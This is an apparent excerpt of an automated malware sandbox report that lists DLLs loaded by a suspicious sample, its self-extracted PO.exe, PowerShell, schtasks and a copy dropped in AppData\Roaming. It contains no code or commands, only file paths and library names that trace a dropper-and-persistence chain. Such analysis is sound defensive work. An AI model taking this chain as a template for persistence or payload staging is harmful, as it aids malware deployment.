Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

